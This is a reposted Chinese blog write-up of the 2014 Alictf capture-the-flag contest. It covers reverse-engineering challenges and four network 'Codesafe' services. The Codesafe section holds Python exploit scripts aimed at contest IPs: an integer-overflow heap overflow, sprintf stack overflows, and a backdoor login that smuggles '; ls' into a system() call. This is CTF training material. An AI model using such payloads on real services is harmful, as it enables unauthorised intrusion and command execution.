码迷,mamicode.com
首页 > 其他好文 > 详细

Alictf Writeup

时间:2014-09-22 19:20:13      阅读:471      评论:0      收藏:0      [点我收藏+]

标签:des   style   blog   http   color   io   os   使用   ar   

Alictf Writeup

Reverse

1.    Ch1

根据题目描述,首先在Ch1.exe文件中搜索Secret.db字符串,如下所示。

 bubuko.com,布布扣

之后定位文件创建和数据写入位置,如下所示。

bubuko.com,布布扣 

可以看到,写入数据的地址位于esp+30h+var10,而在之前调用了data_handle函数对齐进行了处理,data_handle函数有三个参数,分别是pOutBuffer、pInBuffer、InBufferSize,如下所示。

bubuko.com,布布扣 

传入数据如下所示。

bubuko.com,布布扣 

处理完后,位于0x28EF3C处的数据如下所示。

bubuko.com,布布扣 

可以看到,OutBuffer位于0x491B80处,如下所示。

bubuko.com,布布扣 

分析到这儿,可以发现InBuffer明显不是我们所要找的flag,而其值又来源于edi,edi来源于ecx,属于寄存器传参,继续向前跟踪函数。

bubuko.com,布布扣 

在这,我们发现ecx来自于edi,而edi保存的是esi+0F4h处的地址,在这中间对地址中的数据进行了处理,调用了crypto1函数进行了处理。在crypto1中,我们发现有大量的赋值操作,并且这些值的ASCII码都是可视,应该就是我们所要找的flag,如下所示。

 bubuko.com,布布扣

在此处下断,查看内存信息如下所示。

bubuko.com,布布扣 

可以看到加密的key就是位于0x53EE74这0x20字节。

2.    Ch2

这一题是文件加解密相关的,首先创建flag.txt文件,输入文本“0123456789”,得到如下输出结果。

bubuko.com,布布扣 

可以看到这里的每一个数字都用2个字节来表示,只是进行了简单的置换操作,由此我们可以把所有可视的ASCII字符与密码表的对应关系搞清楚,直接替换原来flag.crypt文件中的数据即可,代码如下所示。

 1 #gen_crypto_table.py
 2 
 3 import os
 4 
 5 fp1 = open(flag.txt,r)
 6 fp2 = open(flag.crpyt,rb)
 7 fp3 = open(data.txt,a)
 8 
 9 text1=fp1.read()
10 text2=fp2.read()
11 data_length = len(text1)
12 
13 for i in range(0,data_length):
14          data=text1[i] +   + text2[2*i] + text2[2*i+1] +\n
15          fp3.write(data)
16 
17 fp1.close()
18 fp2.close()
19 fp3.close()
 1 #gen_flag.py
 2 import os
 3 
 4 fp1 = open(data.txt,rb)
 5 fp2 = open(final-flag.crpyt,rb)
 6 
 7 fp3 = open(result.txt,w)
 8 
 9 text1=fp1.read()
10 text2=fp2.read()
11 data2_length = len(text2)
12 data1_length = len(text1)
13 
14 #print data1_length
15 #for j in range(0,18,6):
16 
17 
18 for i in range(0,data2_length,2):
19     target = text2[i:i+2]
20     for j in range(0,data1_length,6):
21         tmp = text1[j:j+4]
22         if(target==tmp[2:]):
23             print repr(target[0]),repr(target[1]),repr(tmp[2]),repr(tmp[3])
24             fp3.write(tmp[0])
25             break;
26 
27 
28 fp1.close()
29 fp2.close()
30 fp3.close()

 

3.    Ch3

这一题使用了UPX压缩壳,数据解压出来后会跳到原程序的入口点,如下所示。

bubuko.com,布布扣 

运行程序,程序在如下位置崩溃。

bubuko.com,布布扣 

查看栈回溯信息。

bubuko.com,布布扣 

发现程序在base_address+0x1943h前call rax出错,如下所示。

bubuko.com,布布扣 

使用UPX对ch3.exe解压,解压出原来的ch3.exe文件来帮助我们分析。根据题目描述,定位到程序崩溃位置,如下所示。

bubuko.com,布布扣 

发现此时调用DecryptDll.dll中的RSADecrypt函数,而在系统中却没有这个函数,导致此时的call rax出错。程序使用了UPX进行压缩,在解压缩的时候可能包含了这些数据,搜索内存,找到如下信息。

bubuko.com,布布扣 

将该段内存(00000001`3f3970a8—00000001`3f3970a8+0xbbe00-1)导出,命名为DecryptDLL.dll。

重新加载程序,运行后仍然崩溃,如下所示。

bubuko.com,布布扣 

栈回溯如下所示。

bubuko.com,布布扣 

发现问题还是出在RSADecrypt函数的调用上,这里传进去4个参数rcx、rdx、r8、r9,他们分别表示pEncryptBuffer、BufferLength、pOutDecryptBuffer和flag(具体细节追踪DecryptDll中RSADecrypt函数处理流程即可知晓),而这里只需将r8的值指向有效内存即可让程序正常运行,如下所示。

bubuko.com,布布扣 

Codesafe

1.    Rpc1

这一题问题在rpc_function_1函数中,如下所示。

bubuko.com,布布扣 

这里的问题在于图中灰色部分,mtl是一个unsigned short,只有两个字节,而此时如果构造的数据满足tl==512 & temp.mtt=200的时候,此时的mtl的值会超过65535,导致malloc分配的空间过小,从而溢出。由此可以构造如下数据。

 1 #rpc1.py
 2 from socket import *
 3 import struct
 4 
 5 class TcpClient:
 6     HOST=223.6.252.25
 7     PORT=30000 
 8     BUFSIZ=1024
 9     ADDR=(HOST, PORT)
10     def __init__(self):
11         self.client=socket(AF_INET, SOCK_STREAM)
12         self.client.connect(self.ADDR)
13 
14         while True:
15             token=A*32
16             dd=A*512
17             data=struct.pack(B,len(token))
18             data+=token
19             data+=struct.pack(B,1)
20             data+=struct.pack(>I,514)
21             data+=struct.pack(<H,200)
22             data+=dd
23             self.client.send(data)
24             data=self.client.recv(self.BUFSIZ)
25             if not data:
26                 break
27             print(从%s收到信息:%s %(self.HOST,data))
28             break
29          
30 if __name__ == __main__:
31     client=TcpClient()


2.    Rpc2
 

这一题问题在rpc_function_2函数中,如下所示。

char buffer[512];
int len = request->len_data;
……
sprintf(buffer,"%s has been parsed, tag:%s, value:%s.", line, pr.t, pr.v);
return create_response(strlen(buffer),buffer);

中间省略了对数据进行解析的部分,最后这里把格式化的数据保存到buffer中,而buffer的大小只有512字节,line来自于网络数据,只要让这里的line的数据长度为512或者这个格式化字符串的长度大于512即可。具体数据如下所示。

 1 #rpc2.py
 2 from socket import *
 3 import struct
 4 
 5 class TcpClient:
 6     HOST=42.120.63.194
 7     PORT=30000 
 8     BUFSIZ=1024
 9     ADDR=(HOST, PORT)
10     def __init__(self):
11         self.client=socket(AF_INET, SOCK_STREAM)
12         self.client.connect(self.ADDR)
13 
14         while True:
15             token=A*32
16             
17             d1=A*63+=+21*8
18             d2= *(512-len(d1)) + d1
19             
20             data=struct.pack(B,len(token))
21             data+=token
22             data+=struct.pack(B,2)
23             data+=struct.pack(>I,512)
24             
25             data+=d2
26             self.client.send(data)
27             data=self.client.recv(self.BUFSIZ)
28             if not data:
29                 break
30             print(从%s收到信息:%s %(self.HOST,data))
31             break
32          
33 if __name__ == __main__:
34     client=TcpClient()

3.    Rpc3 

这一题问题在rpc_function_2函数中,和Codesafe 2类似,都是sprintf造成的问题,如下所示。

bubuko.com,布布扣 

在上图灰色部分,r的大小为256字节,而p的数据通过function6进行处理的,只要想办法让这p的字符串大小在256左右即可触发漏洞。

bubuko.com,布布扣

在上图的function6中,我们可以看到p来自于t.szUrl中的“http://”之后的部分,这样我们就可以构造如下数据。

 1 #rpc4.py
 2 from socket import *
 3 import struct
 4 import time
 5 
 6 class TcpClient:
 7     HOST=223.6.253.103
 8     PORT=30000 
 9     BUFSIZ=1024
10     ADDR=(HOST, PORT)
11     def __init__(self):
12         self.client=socket(AF_INET, SOCK_STREAM)
13         self.client.connect(self.ADDR)
14 
15         while True:
16             token=A*32
17             data=struct.pack(B,len(token))
18             data+=token    
19             data+=struct.pack(B,2)
20                         
21             flag_v=2
22             stc=\x48\x48\x00\x00 #mn
23             stc+=struct.pack(I,int(time.time())); #ts
24             stc+=struct.pack(I,flag_v) #v
25             stc+="sdatsts-afu"+"\x00"*(16-len("sdatsts-afu")) #k
26             url="http://alibaba.com/"+"A"*(256-len("http://alibaba.com/"))
27             stc+=struct.pack("I",len(url)) #len
28             stc+=url+"\x00"*(256-len(url)) #szUrl
29             
30             data+=struct.pack(>I,len(stc))
31             data+=stc
32             self.client.send(data)
33             data=self.client.recv(self.BUFSIZ)
34             if not data:
35                 break
36             print(从%s收到信息:%s %(self.HOST,data))
37             break
38          
39 if __name__ == __main__:
40     client=TcpClient()

4.    Rpc4 

这一题问题在rpc_function_1函数中,存在一个后门登陆漏洞,如下所示。

 bubuko.com,布布扣

在上图灰色部分,能够调用system函数执行指定的指令,而想要到达这条路径,必须让”login==1 && strcmp(szUser,”admin”)==)”这个条件,也就是满足szUser==”admin”和value=”ALIBABA”这两个条件,具体的数据构造如下所示。

 1 #rpc4.py
 2 from socket import *
 3 import struct
 4 
 5 class TcpClient:
 6     HOST=223.6.251.166
 7     PORT=30000 
 8     BUFSIZ=1024
 9     ADDR=(HOST, PORT)
10     def __init__(self):
11         self.client=socket(AF_INET, SOCK_STREAM)
12         self.client.connect(self.ADDR)
13 
14         while True:
15             token=A*32
16 
17             data=struct.pack(B,len(token))
18             data+=token
19 
20             data+=struct.pack(B,1)
21             data+=struct.pack(>I,512)
22 
23             
24             user=admin+ *64+admi #stc2.user
25             u_pass=urejhvg #stc2.pass
26             ins=www.taobao.com; ls #stc2.buffer
27             data1=user+"\x00"*(128-len(user))+u_pass+"\x00"*(128-len(u_pass))+ins+"\x00"*(256-len(ins))
28             
29             data+=data1
30             
31             self.client.send(data)
32             data=self.client.recv(self.BUFSIZ)
33             if not data:
34                 break
35             print(从%s收到信息:%s %(self.HOST,data))
36             break
37          
38 if __name__ == __main__:
39     client=TcpClient()

 

奋斗了两天之后,解出了这么点题……感觉逆向能力还有待进一步加强,另外,基本上codesafe题都和socket通信有关,reverse4、5题能力要求有点高,感觉时间还是不够,熟练度有待进一步提高。。。

Alictf Writeup

标签:des   style   blog   http   color   io   os   使用   ar   

原文地址:http://www.cnblogs.com/wal613/p/3986347.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!